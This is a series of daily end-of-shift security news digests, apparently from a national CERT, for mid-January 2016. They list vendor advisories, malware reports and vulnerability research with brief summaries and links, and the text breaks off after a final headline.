*** Multiple Buffalo network devices vulnerable to cross-site request forgery ***
---------------------------------------------
Multiple network devices provided by BUFFALO INC. contain a cross-site request forgery vulnerability.
---------------------------------------------
http://jvn.jp/en/jp/JVN09268287/
*** DSA-3451 fuse - security update ***
---------------------------------------------
Jann Horn discovered a vulnerability in the fuse (Filesystem in Userspace) package in Debian. The fuse package ships a udev rule adjusting permissions on the related /dev/cuse character device, making it world writable.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3451
*** DFN-CERT-2016-0129: NTP: A vulnerability allows gaining administrator privileges ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0129/
*** DFN-CERT-2016-0125: Red Hat JBoss Web Server: Multiple vulnerabilities allow denial-of-service attacks and bypassing of security measures ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0125/
*** USN-2879-1: rsync vulnerability ***
---------------------------------------------
Ubuntu Security Notice USN-2879-1, 21st January, 2016. rsync vulnerability. A security issue affects these releases of Ubuntu and its derivatives: Ubuntu 15.10, Ubuntu 15.04, Ubuntu 14.04 LTS, Ubuntu 12.04 LTS. Summary: rsync could be made to write files outside of the expected directory. Software description: rsync - fast, versatile, remote (and local) file-copying tool. Details: It was discovered that rsync incorrectly handled invalid filenames. A malicious server could use this issue to write files outside of...
---------------------------------------------
http://www.ubuntu.com/usn/usn-2879-1/
*** CAREL PlantVisor Enhanced Authentication Bypass Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for an authorization bypass vulnerability in CAREL's PlantVisor application.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-021-01
*** Security Advisory: NTP vulnerabilities CVE-2015-5194 and CVE-2015-5195 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/02/sol02360853.html?…
*** Bugtraq: January 2016 - Bamboo - Critical Security Advisory ***
---------------------------------------------
http://www.securityfocus.com/archive/1/537347
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 20-01-2016 18:00 − Donnerstag 21-01-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Asacub Android Trojan: Financial fraud and information stealing ***
---------------------------------------------
Asacub is a new malware that targets Android users for financial gain. When first identified, Asacub displayed all the signs of an information stealing malware; however, some versions of the Trojan ar...
---------------------------------------------
http://www.net-security.org/malware_news.php?id=3190
*** TeslaCrypt Decrypted: Flaw in TeslaCrypt allows Victims to Recover their Files ***
---------------------------------------------
For a little over a month, researchers and previous victims have been quietly helping TeslaCrypt victims get their files back using a flaw in TeslaCrypt's encryption key storage algorithm. The information that the ransomware could be decrypted was being kept quiet so that the malware developer would not learn about it and fix the flaw. Since the recently released TeslaCrypt 3.0 has fixed this flaw, we have decided to publish the information on how a victim could...
---------------------------------------------
http://www.bleepingcomputer.com/news/security/teslacrypt-decrypted-flaw-in-…
*** El Chapo's Opsec ***
---------------------------------------------
I've already written about Sean Penn's opsec while communicating with El Chapo. Here's the technique of mirroring, explained: El Chapo then switched to a complex system of using BBM (BlackBerry's Instant Messaging) and proxies. The way it worked was if you needed to contact The Boss, you would send a BBM text to an intermediary (who would spend his days...
---------------------------------------------
https://www.schneier.com/blog/archives/2016/01/el_chapos_opsec.html
*** Cyber fraudsters steal over $50 million from airplane systems manufacturer ***
---------------------------------------------
Austrian company FACC, which develops and produces components and systems made of composite materials for aircraft and aircraft engine manufacturers such as Boeing and Airbus, has been hit by hackers who managed to steal approximately 50 million euros (around $54.5 million).
---------------------------------------------
http://www.net-security.org/secworld.php?id=19356
http://www.net-security.org/secworld.php?id=18808 (An emerging global threat: BEC scams hitting more and more businesses)
*** Linux root exploit: Android threat manageable ***
---------------------------------------------
A member of the Android security team assumes that only a few Android versions are vulnerable to the local privilege escalation hole in the Linux kernel. A patch is in the works.
---------------------------------------------
http://heise.de/-3080760
*** Captive portals: The iPhone leaks cookies ***
---------------------------------------------
Using WLANs with captive portals can become a security risk for iPhone users. Israeli security researchers found a corresponding bug. Apple has since fixed the vulnerability.
---------------------------------------------
http://www.golem.de/news/captive-portals-das-iphone-verraet-cookies-1601-11…
*** Deliberately hidden backdoor account in several AMX (HARMAN Professional) devices ***
---------------------------------------------
Your conference room, a watchful protector. "AMX (www.amx.com) is part of the HARMAN Professional Division, and the leading brand for the business, education, and government markets for the company. As such, AMX is dedicated to integrating AV solutions for an IT World. AMX solves the complexity of managing technology with reliable, consistent and scalable systems comprising control and automation, system-wide switching and AV signal distribution, digital signage and technology management."
---------------------------------------------
http://blog.sec-consult.com/2016/01/deliberately-hidden-backdoor-account-in…
*** "Investigations" ***
---------------------------------------------
"Investigations" | 21 January 2016 | We (wearing our GovCERT hat) are once again on site, helping an organisation with root-cause analysis and with restoring its services after a security incident. So far so good; that is what we are there for, that is our job. Law enforcement, however, is definitely not our job. That is quite clear, and nobody claims otherwise. It becomes problematic when terms are used which in normal...
---------------------------------------------
http://www.cert.at/services/blog/20160121173915-1656.html
*** OpenVAS Greenbone Security Assistant Cross Site Scripting ***
---------------------------------------------
Topic: OpenVAS Greenbone Security Assistant Cross Site Scripting. Risk: Low. Text: Vulnerability information. Date: 13th January 2016. Product: Greenbone Security Assistant ≥ 6.0.0 and < 6.0.8. Vendor:...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016010133
*** Security Advisory: BIG-IP file validation vulnerability CVE-2015-8021 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/49/sol49580002.html?…
*** Security Advisory: SNTP vulnerability CVE-2015-5219 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/60/sol60352002.html?…
*** LiteSpeed Web Server Input Validation Flaw Lets Remote Users Inject HTTP Headers ***
---------------------------------------------
http://www.securitytracker.com/id/1034746
*** DFN-CERT-2016-0118: Moodle: Two vulnerabilities allow, among other things, a cross-site scripting attack ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0118/
=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 19-01-2016 18:00 − Mittwoch 20-01-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Survey shows many businesses aren't encrypting private employee data ***
---------------------------------------------
Many companies aren't encrypting their own employees' private data, according to a Sophos survey of IT decision makers in six countries.
---------------------------------------------
https://nakedsecurity.sophos.com/2016/01/19/survey-shows-many-businesses-ar…
*** Android Malware Steals Voice-Based Two-Factor Authentication Codes (January 13 and 18, 2016) ***
---------------------------------------------
Symantec has detected malware created for Android devices that steals single-use passcodes generated to add a layer of security to online banking authentication procedures...
---------------------------------------------
http://www.sans.org/newsletters/newsbites/r/18/5/201
*** Dridex banking malware adds a new trick ***
---------------------------------------------
Dridex, the banking malware that won't go away, has been improved upon once again. IBM's X-Force researchers have found that the latest version of Dridex uses a DNS (Domain Name System) trick to direct victims to fake banking websites. The technique, known as DNS cache poisoning, involves changing DNS settings to direct someone asking for a legitimate banking website to a fake site. DNS cache poisoning is a powerful attack. Even if a person types in the correct domain name for a bank, the fake...
---------------------------------------------
http://www.cio.com/article/3024244/dridex-banking-malware-adds-a-new-trick.…
*** /tmp, %TEMP%, ~/Desktop, T:\, ... A goldmine for pentesters!, (Wed, Jan 20th) ***
---------------------------------------------
When you are performing a penetration test, you need to learn how your target is working: what kind of technologies and tools are used, how internal usernames are generated, email address format, ... Grabbing such information is called the reconnaissance phase. Once you have collected enough details, you can prepare your different scenarios to attack the target. All pentesters have their personal toolbox that has been enhanced day after day. In many cases, there is no real magic: to abuse or...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20631&rss
*** Critical Patch Update: Oracle provides 248 security patches ***
---------------------------------------------
Oracle's largest security patch collection to date is here and fixes holes in Database, Java, MySQL and others. This time Oracle's E-Business Suite is the focus.
---------------------------------------------
http://heise.de/-3077692
*** Apple Releases Patches for iOS, OS X and Safari ***
---------------------------------------------
Apple released security updates for iOS, OS X and Safari, patching a number of kernel-level code-execution vulnerabilities.
---------------------------------------------
http://threatpost.com/apple-releases-patches-for-ios-os-x-and-safari/115946/
*** Trojan for Android preinstalled on Phillips s307 firmware ***
---------------------------------------------
January 20, 2016. The past year was marked by a large number of firmware Trojans for Android capable of covertly downloading and installing various software and displaying annoying advertisements. Android.Cooee.1, incorporated into the graphical shell of some cheap Chinese smartphones, was one of them. Virus makers obviously continued to preinstall Android.Cooee.1 on mobile devices. This time, however, Doctor Web security researchers detected the Trojan in the firmware of a well-known electronics manufacturer.
---------------------------------------------
http://news.drweb.com/show/?i=9792&lng=en&c=9
*** Primes, parameters and moduli ***
---------------------------------------------
First a brief history of Diffie-Hellman for those not familiar with it The short version of Diffie-Hellman is that two parties (Alice and Bob) want to share a secret so they can encrypt their communications and talk securely without an...
---------------------------------------------
https://securityblog.redhat.com/2016/01/20/primes-parameters-and-moduli/
*** Serious flaw patched in Intel Driver Update Utility ***
---------------------------------------------
A software utility that helps users download the latest drivers for their Intel hardware components contained a vulnerability that could have allowed man-in-the-middle attackers to execute malicious code on computers. The tool, known as the Intel Driver Update Utility, can be downloaded from Intel's support website. It provides an easy way to find the latest drivers for various Intel chipsets, graphics cards, wireless cards, desktop boards, Intel NUC mini PCs or the Intel Compute Stick.
---------------------------------------------
http://www.cio.com/article/3024345/serious-flaw-patched-in-intel-driver-upd…
*** Cisco Guide to Harden Cisco IOS Devices ***
---------------------------------------------
This document contains information to help you secure your Cisco IOS system devices, which increases the overall security of your network. Structured around the three planes into which functions of a network device can be categorized, this document provides an overview of each included feature and references to related documentation.
---------------------------------------------
http://www.cisco.com/c/en/us/support/docs/ip/access-lists/13608-21.html
*** Security Advisory: BIND vulnerability CVE-2015-8704 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/53/sol53445000.html?…
*** Intel Driver Update Utility 2.2.0.5 Man-In-The-Middle ***
---------------------------------------------
Topic: Intel Driver Update Utility 2.2.0.5 Man-In-The-Middle Risk: Medium Text:1. Advisory Information Title: Intel Driver Update Utility MiTM Advisory ID: CORE-2016-0001 Advisory URL: http://www.cores...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016010119
*** Oracle Critical Patch Update Advisory - January 2016 ***
---------------------------------------------
http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
*** Oracle Linux Bulletin - January 2016 ***
---------------------------------------------
http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867…
*** HPSBGN03534 rev.1 - HPE Performance Center using Microsoft Report Viewer, Remote Disclosure of Information, Cross-Site Scripting (XSS) ***
---------------------------------------------
A vulnerability in Microsoft Report Viewer was addressed by HPE Performance Center. This is a Cross-Site scripting (XSS) vulnerability that could allow remote information disclosure.
---------------------------------------------
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr…
*** Xen Security Advisory CVE-2016-1571 / XSA-168 ***
---------------------------------------------
VMX: intercept issue with INVLPG on non-canonical address
---------------------------------------------
http://xenbits.xen.org/xsa/advisory-168.html
*** Xen Security Advisory CVE-2016-1570 / XSA-167 ***
---------------------------------------------
PV superpage functionality missing sanity checks
---------------------------------------------
http://xenbits.xen.org/xsa/advisory-167.html
*** Cisco Modular Encoding Platform D9036 Software Default Credentials Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco Unified Computing System Manager and Cisco Firepower 9000 Remote Command Execution Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** DFN-CERT-2016-0109: Foxit Reader, Foxit PhantomPDF: Multiple vulnerabilities allow denial-of-service attacks and the execution of arbitrary code ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0109/
*** DFN-CERT-2016-0106: NTP: Multiple vulnerabilities allow, among other things, the presentation of false information ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0106/
*** APPLE-SA-2016-01-19-3 Safari 9.0.3 ***
---------------------------------------------
APPLE-SA-2016-01-19-3 Safari 9.0.3. Safari 9.0.3 is now available and addresses the following: WebKit. Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, OS X El Capitan v10.11 to v10.11.2. Impact: Visiting a maliciously crafted website may lead to arbitrary code execution [...]
---------------------------------------------
http://prod.lists.apple.com/archives/security-announce/2016/Jan/msg00004.ht…
*** APPLE-SA-2016-01-19-2 OS X El Capitan 10.11.3 and Security Update 2016-001 ***
---------------------------------------------
APPLE-SA-2016-01-19-2 OS X El Capitan 10.11.3 and Security Update 2016-001. OS X El Capitan 10.11.3 and Security Update 2016-001 is now available and addresses the following: AppleGraphicsPowerManagement. Available for: OS X El Capitan v10.11 to v10.11. [...]
---------------------------------------------
http://prod.lists.apple.com/archives/security-announce/2016/Jan/msg00003.ht…
*** APPLE-SA-2016-01-19-1 iOS 9.2.1 ***
---------------------------------------------
APPLE-SA-2016-01-19-1 iOS 9.2.1. iOS 9.2.1 is now available and addresses the following: Disk Images. Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later. Impact: A local user may be able to execute arbitrary code with kernel privileges [...]
---------------------------------------------
http://prod.lists.apple.com/archives/security-announce/2016/Jan/msg00002.ht…
*** DSA-3449 bind9 - security update ***
---------------------------------------------
It was discovered that specific APL RR data could trigger an INSIST failure in apl_42.c and cause the BIND DNS server to exit, leading to a denial-of-service.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3449
*** Siemens OZW672 and OZW772 XSS Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a cross-site scripting vulnerability in Siemens OZW672 and OZW772 devices.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-019-01
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM FlashSystem model V840 (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005584
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM FlashSystem model 840 (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005585
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSH affect IBM SmartCloud Provisioning for IBM Software Virtual Appliance (CVE-2016-0777, CVE-2016-0778) ***
http://www.ibm.com/support/docview.wss?uid=swg2C1000044
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM SAN Volume Controller and Storwize Family (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005583
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM Sterling Connect:Express for UNIX (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21974473
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM Sterling Connect:Direct for UNIX (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21974888
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in the GSKit component of IBM WebSphere MQ (CVE-2016-0201) ***
http://www.ibm.com/support/docview.wss?uid=swg21974466
---------------------------------------------
*** IBM Security Bulletin: IBM Spectrum Scale is affected by a security vulnerability (CVE-2015-7488) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005580
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in IBM SDK for Node.js affect IBM Business Process Manager Configuration Editor (CVE-2015-8027, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196) ***
http://www.ibm.com/support/docview.wss?uid=swg21974459
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Spectrum Scale (CVE-2015-4843, CVE-2015-4805, CVE-2015-4810, CVE-2015-4806, CVE-2015-4871, CVE-2015-4902) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005579
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM API Management (CVE-2015-4872 CVE-2015-4911 CVE-2015-4893 CVE-2015-4803) ***
http://www.ibm.com/support/docview.wss?uid=swg21974673
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SD affect Guardium Data Reduction ***
http://www.ibm.com/support/docview.wss?uid=swg21973724
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli Composite Application Manager for Transactions (Multiple CVEs) ***
http://www.ibm.com/support/docview.wss?uid=swg21971951
---------------------------------------------
*** IBM Security Bulletin: Multiple Security Vulnerabilities exist in IBM Cognos Express. ***
http://www.ibm.com/support/docview.wss?uid=swg21972376
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 18-01-2016 18:00 − Tuesday 19-01-2016 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** FDA Issues Guidelines on Medical Device Cybersecurity ***
---------------------------------------------
The Food and Drug Administration (FDA) issued a new set of draft guidelines on Friday in hopes medical device manufacturers address cybersecurity risks in their products.
---------------------------------------------
http://threatpost.com/fda-issues-guidelines-on-medical-device-cybersecurity…
*** Good practice guide on disclosing vulnerabilities ***
---------------------------------------------
ENISA published a good practice guide on vulnerability disclosure, aiming to provide a picture of the challenges the security researchers, the vendors and other involved stakeholders are confronted wi...
---------------------------------------------
http://www.net-security.org/secworld.php?id=19342
*** Microsoft asks: We've taken down botnets for you. How about a kill switch? ***
---------------------------------------------
It's like pulling a smoking car off the road... Oh, hang on. Last December, Microsoft intercepted traffic on users' PCs and helped break up a botnet. And nobody complained. So the company very tentatively asked at a session on ethics and policy in Brussels this week whether it should do more.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/01/19/microsoft_b…
*** Security: XSS hole in Yahoo Mail fixed ***
---------------------------------------------
An XSS vulnerability in Yahoo Mail allowed attackers to take over other people's accounts. They could have forwarded all of a user's e-mails and infected outgoing e-mails with viruses, a security researcher writes. Yahoo has already responded.
---------------------------------------------
http://www.golem.de/news/security-xss-luecke-in-yahoo-mail-gefixt-1601-1186…
*** Angler Exploit Kit's January Vacation ***
---------------------------------------------
Since last year, we've been monitoring various redirectors which lead to exploit kits (EK). One of the redirectors in question routes to either Angler EK or Neutrino EK. SANS ISC has also observed this particular redirector switching between these two kits. At the beginning of this year, we noticed a sudden significant drop in our...
---------------------------------------------
https://labsblog.f-secure.com/2016/01/19/angler-exploit-kits-january-vacati…
*** Root exploit: Android and Linux vulnerable to privilege trickery ***
---------------------------------------------
Since 2012, a trick involving the kernel's keyring has handed root privileges to any user. However, the user must already be logged in for this.
---------------------------------------------
http://heise.de/-3076663
*** MSN Home Page Drops More Malware Via Malvertising ***
---------------------------------------------
Visitors to the MSN homepage may have been exposed to malvertising.
---------------------------------------------
https://blog.malwarebytes.org/malvertising-2/2016/01/msn-home-page-drops-mo…
*** Cisco Web Security Appliance Security Bypass Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Moodle Bugs Let Remote Users Access Hidden Course and Conduct Cross-Site Scripting Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1034694
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 15-01-2016 18:00 − Monday 18-01-2016 18:00
Handler: Stephan Richter
Co-Handler: Alexander Riepl
*** Cisco FireSIGHT Management Center Stored Cross-Site Scripting Vulnerabilities ***
---------------------------------------------
Multiple vulnerabilities in the web framework of Cisco FireSIGHT Management Center could allow an unauthenticated, remote attacker to execute a stored cross-site scripting (XSS) attack against a user of the Cisco FireSIGHT Management Center web interface.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Easily Exploitable Vulnerability Could Cause Physical Damage to Industrial Motors ***
---------------------------------------------
http://www.sans.org/newsletters/newsbites/r/18/4/307
*** Cisco FireSIGHT Management Center DOM-Based Cross-Site Scripting Vulnerability ***
---------------------------------------------
Cisco FireSIGHT Management Center (MC) contains a DOM-based cross-site scripting (XSS) vulnerability in the management page. An unauthenticated, remote attacker could persuade a user to perform a malicious action, allowing the attacker to perform an XSS attack.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** IBM Security Bulletin: Vulnerabilities in GNU grep utility affect IBM Security Network Protection (CVE-2012-5667, and CVE-2015-1345) ***
---------------------------------------------
The grep utility searches through textual input for lines that contain a match to a specified pattern and then prints the matching lines. Security vulnerabilities have been discovered in the grep utility used with IBM Security Network Protection.
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg21972209
*** IBM Security Bulletin: IBM WebSphere Application Server Liberty Profile vulnerability affects IBM Tivoli Application Dependency Discovery Manager (TADDM) (CVE-2015-2017) ***
---------------------------------------------
WebSphere Application Server Liberty Profile, which is embedded in TADDM, could allow a remote attacker who has access to the customer application, or to a form that sends its contents in a header, to split the response and add headers to it. The customer application would then allow cross-site scripting, web cache poisoning, and other similar exploits.
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg21974782
*** Cisco Adaptive Security Appliance Information Disclosure Vulnerability ***
---------------------------------------------
A vulnerability in the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to access sensitive data. The attacker could use this information to conduct additional attacks.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** The SLOTH attack and IKE/IPsec ***
---------------------------------------------
The IKE daemons in RHEL7 (libreswan) and RHEL6 (openswan) are not vulnerable to the SLOTH attack. But the attack is still interesting to look at. The SLOTH attack released today is a new transcript collision attack against ..
---------------------------------------------
https://securityblog.redhat.com/2016/01/15/the-sloth-attack-and-ikeipsec/
*** Serious vulnerability in surveillance cameras sold by Hofer and Aldi ***
---------------------------------------------
Security experts warn of surveillance cameras of the brand Maginon. They allow unprotected access to video and audio, but also to WLAN and e-mail passwords.
---------------------------------------------
http://futurezone.at/produkte/schwere-luecke-bei-ueberwachungskameras-von-h…
*** LostPass ***
---------------------------------------------
I have discovered a phishing attack against LastPass that allows an attacker to steal a LastPass user's email, password, and even two-factor auth code, giving full access to all passwords and documents stored in LastPass.
---------------------------------------------
https://www.seancassidy.me/lostpass.html
*** Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 - and a new network attack ***
---------------------------------------------
Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing.
---------------------------------------------
http://foxglovesecurity.com/2016/01/16/hot-potato/
*** HTTP Evasions Explained - Part 10 - Lazy Browsers ***
---------------------------------------------
The previous parts of this series looked at firewalls and browsers as black boxes which just behave that way for unknown reasons. For this part I took a closer look at the source code of Chromium and Firefox. This way I've found even more ways to construct HTTP which is insanely broken but still gets accepted by the ..
---------------------------------------------
http://noxxi.de/research/http-evader-explained-10-lazy-browsers.html
*** nic.at introduces "Security-Lock" for domains ***
---------------------------------------------
The protection is meant to prevent a domain from becoming unreachable or being manipulated by mistake
---------------------------------------------
http://derstandard.at/2000029286062
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 14-01-2016 18:00 − Friday 15-01-2016 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** NCCIC/ICS-CERT Monitor for November-December 2015 ***
---------------------------------------------
The NCCIC/ICS-CERT Monitor for November-December 2015 is a summary of ICS-CERT activities for that period of time.
---------------------------------------------
https://ics-cert.us-cert.gov/monitors/ICS-MM201512
Download: https://ics-cert.us-cert.gov/sites/default/files/Monitors/ICS-CERT%20Monito…
*** Oracle Critical Patch Update - January 2016 - Pre-Release Announcement ***
---------------------------------------------
[...] This Critical Patch Update contains 248 new security vulnerability fixes across hundreds of Oracle products. Some of the vulnerabilities addressed in this Critical Patch Update affect multiple products. Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply Critical Patch Update fixes as soon as possible.
---------------------------------------------
http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
*** Creator of MegalodonHTTP DDoS Botnet Arrested ***
---------------------------------------------
Last month, the Norway police arrested five hackers accused of running the MegalodonHTTP Remote Access Trojan (RAT). The arrests came as part of the joint operation between Norway's Kripos National Criminal Investigation Service and Europol, codenamed "OP Falling sTAR." According to the United States security firm, all the five men, aged between 16 and 24 years and located in Romania,...
---------------------------------------------
https://thehackernews.com/2016/01/MegalodonHTTP-DDoS-Botnet.html
*** Credit card hack at VISA: A1 customers among those affected ***
---------------------------------------------
A third-party provider in Iceland was attacked - around 2,000 A1 Visa customers receive new cards
---------------------------------------------
http://derstandard.at/2000029114201
*** Updated BlackEnergy Trojan Grows More Powerful ***
---------------------------------------------
In late December, a cyberattack caused a power outage in the Ukraine, plunging hundreds of thousands of citizens into darkness for hours. Threat researchers soon confirmed that the BlackEnergy malware package, first developed in 2007, was the culprit. They also discovered that the malware has been significantly upgraded since its first release.
---------------------------------------------
https://blogs.mcafee.com/mcafee-labs/updated-blackenergy-trojan-grows-more-…
*** Secure again: OAuth authentication protocol ***
---------------------------------------------
Attackers were reportedly once again able to harvest users' login data when those users sign in to online services via OAuth. The vulnerabilities have already been closed. Security researchers attest that the protocol is, overall, highly secure.
---------------------------------------------
http://heise.de/-3071639
*** Spamming Someone from PayPal ***
---------------------------------------------
Troy Hunt has identified a new spam vector. PayPal allows someone to send someone else a $0 invoice. The spam is in the notes field. But it's a legitimate e-mail from PayPal, so it evades many of the traditional spam filters. Presumably it doesn't cost anything to send a $0 invoice via PayPal. Hopefully, the company will close this loophole...
---------------------------------------------
https://www.schneier.com/blog/archives/2016/01/spamming_someon.html
*** OS X's Gatekeeper bypassed again ***
---------------------------------------------
Do you remember when, last October, Synack director of research Patrick Wardle found a simple way to evade OS X's Gatekeeper defense mechanism by bundling up a legitimate Apple-signed app with a malic...
---------------------------------------------
http://www.net-security.org/secworld.php?id=19336
*** Advantech WebAccess Vulnerabilities ***
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01
*** Manage Engine Applications Manager 12 Multiple Vulnerabilities ***
---------------------------------------------
Applications Manager suffers from multiple vulnerabilities including XSS, CSRF and Privilege Escalation.
---------------------------------------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5292.php
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 13-01-2016 18:00 − Thursday 14-01-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** SlemBunk Part II: Prolonged Attack Chain and Better-Organized Campaign ***
---------------------------------------------
Our follow-up investigation of a nasty Android banking malware we identified at the tail end of last year has not only revealed that the trojan is more persistent than we initially realized - thus making for a much more dangerous threat - but that it is also being used as part of an ongoing and evolving campaign.
---------------------------------------------
https://www.fireeye.com/blog/threat-research/2016/01/slembunk-part-two.html
*** Faulty ransomware renders files unrecoverable, even by the attacker ***
---------------------------------------------
A cybercriminal has built a ransomware program based on proof-of-concept code released online, but messed up the implementation, resulting in victims' files being completely unrecoverable. Researchers from antivirus vendor Trend Micro recently ..
---------------------------------------------
http://www.cio.com/article/3022159/faulty-ransomware-renders-files-unrecove…
*** As easy as Citrix123 - hacker claims he popped Citrix's CMS ***
---------------------------------------------
And once he was in, it became possible to pour malware onto all customers, allegedly. A Russian hacker claims he broke into systems run by Citrix, and gained access to potentially a huge number of customers.
---------------------------------------------
www.theregister.co.uk/2016/01/13/ruskie_hacker_pops_citrix/
*** Ex-NSA chief: Backdoors for encryption are a terrible idea ***
---------------------------------------------
Michael Hayden contradicts the demands of FBI boss James Comey
---------------------------------------------
http://derstandard.at/2000029033330
*** RedHen CRM - Moderately Critical - Cross Site Scripting (XSS) - SA-CONTRIB-2016-002 ***
---------------------------------------------
The Redhen set of modules allows you to build CRM features into a Drupal site. When rendering individual Contacts, this module does not properly filter certain data prior to display. When rendering listings of notes or engagement scores, ..
---------------------------------------------
https://www.drupal.org/node/2649800
*** Cisco struggles with a static password and fixes critical vulnerabilities ***
---------------------------------------------
Cisco's Identity Services Engine contains one vulnerability rated critical and one rated high. Besides the Wireless LAN Controller software, Aironet 1800 series base stations are also vulnerable. Security updates are available.
---------------------------------------------
http://heise.de/-3070756
*** Attack of the cyber squirrels ***
---------------------------------------------
Squirrels are a bigger threat to Internet and power lines than hackers. The website CyberSquirrel1 demonstrates this with a wink.
---------------------------------------------
http://www.golem.de/news/internet-und-stromausfaelle-angriff-der-cyber-eich…
*** OpenSSL version 1.1.0 pre release 2 published ***
---------------------------------------------
OpenSSL 1.1.0 is currently in alpha. OpenSSL 1.1.0 pre release 2 has now been made available. For details of changes and known issues see the release ..
---------------------------------------------
https://mta.openssl.org/pipermail/openssl-announce/2016-January/000057.html
*** Triple-Seven: OpenSSH vulnerability leaks secret keys ***
---------------------------------------------
An unfinished option that has been enabled by default in OpenSSH since 2010 allows hijacked servers to read out the secret keys of connecting users. Updates that close the hole are available.
---------------------------------------------
http://heise.de/-3071372
*** Ransomware a Threat to Cloud Services, Too ***
---------------------------------------------
Ransomware -- malicious software that encrypts the victim's files and holds them hostage unless and until the victim pays a ransom in Bitcoin -- has emerged as a potent and increasingly common threat online. But many Internet users are unaware that ransomware can just as easily seize control over files stored on cloud services.
---------------------------------------------
http://krebsonsecurity.com/2016/01/ransomware-a-threat-to-cloud-services-to…
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 12-01-2016 18:00 − Wednesday 13-01-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Security Bulletins Posted for Adobe Acrobat and Reader ***
---------------------------------------------
Security Bulletins for Adobe Acrobat and Reader (APSB16-02) have been published. These updates address critical vulnerabilities, and Adobe recommends users update their product installations to the latest versions using the instructions referenced in the relevant security bulletin. This posting ..
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1311
*** There Goes The Neighborhood - Bad Actors on GMHOST Alexander Mulgin Serginovic ***
